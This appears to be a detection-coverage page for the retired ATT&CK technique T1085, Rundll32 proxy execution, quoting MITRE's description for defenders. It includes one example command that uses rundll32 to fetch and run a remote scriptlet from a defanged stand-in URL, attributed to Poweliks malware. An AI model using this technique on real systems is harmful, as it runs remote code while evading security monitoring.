Cross-source coverage
T1085 / ATT&CK
Rundll32
ATT&CK has retired this technique. Rules still tag it; the current id is T1218.011 System Binary Proxy Execution: Rundll32.
0 rules across 0 sources.
6 deprecated hidden · include
From MITRE ATT&CK 19.2
The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.
Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a.cpl file also causes rundll32.exe to execute.
Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks.
- Platforms
- Windows
- Telemetry
- —
No live rules cover this technique. 6 deprecated rules are hidden.